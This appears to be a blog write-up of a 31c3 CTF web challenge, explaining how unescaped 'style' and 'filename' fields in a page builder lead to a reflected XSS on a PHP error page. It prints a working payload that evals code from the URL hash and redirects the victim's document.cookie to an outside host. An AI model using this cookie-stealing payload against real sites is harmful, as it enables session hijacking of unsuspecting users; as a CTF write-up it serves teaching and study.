This challenge needs only XSS but it is interesting to me 🙂

These guys have ripped off our designs and using them in their web pages builder! We’d Haxx them, don’t worry we’ll give you decent points for it. http://188.40.18.76/

スクリーンショット 2015-01-02 8.40.09

By using the form, we could generate a page.(such as http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/filename)

It htmlspecialchars the “title” and “file content” but not “style” or “filename”.

The maximum size of “style” is 8bytes and that of “filename” is 65bytes.

Then, “filename” can be foo.php and “style” can be <?php a so that it shows PHP error.

(http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/foo.php)

Parse error: syntax error, unexpected ‘” rel=”‘ (T_CONSTANT_ENCAPSED_STRING) in /var/www/html/output/19c94d778563b117e18e3442e887989aea14277d/foo.php on line 10

hmm… PHP code exeution looks difficult because maximum size of “style” is 8bytes and short_open_tag is offed. (and * is removed from “title” and “file content”)

So let’s search another vulnerability.

We can XSS with “filename”, because the error page above prints “filename” that is not escaped!

http://188.40.18.76/output/19c94d778563b117e18e3442e887989aea14277d/%3Cbody onload=%22eval%28location.hash.slice%281%29%29%22.php#
location.href=%27http://tyage.net/%27+document.cookie

(Notice: we put the code in location.hash to fit in the maximum length of “filename”)

Now, just submit a link above in the contact form and we capture the flag!

31c3_Y0u_H4v3_F0und_My_W34k_Err0R_P01n7

カテゴリー: CTF

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です